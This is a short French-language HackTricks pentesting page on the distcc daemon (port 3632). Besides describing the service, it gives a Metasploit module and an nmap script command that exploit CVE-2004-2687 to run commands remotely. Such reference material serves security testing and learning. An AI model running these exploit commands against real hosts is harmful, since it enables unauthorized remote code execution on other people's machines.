3.4 KiB
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Informations de base
Distcc est un outil qui améliore le processus de compilation en utilisant la puissance de traitement inoccupée d'autres ordinateurs sur le réseau. Lorsque distcc est configuré sur une machine, cette machine est capable de distribuer ses tâches de compilation à un autre système. Ce système récepteur doit exécuter le démon distccd et doit avoir un compilateur compatible installé pour traiter le code envoyé.
Port par défaut : 3632
PORT STATE SERVICE
3632/tcp open distccd
Exploitation
Vérifiez s'il est vulnérable à CVE-2004-2687 pour exécuter du code arbitraire :
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
Je ne pense pas que shodan détecte ce service.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post créé par Álex B (@r1p)
{% hint style="success" %}
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement!
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs aux HackTricks et HackTricks Cloud dépôts github.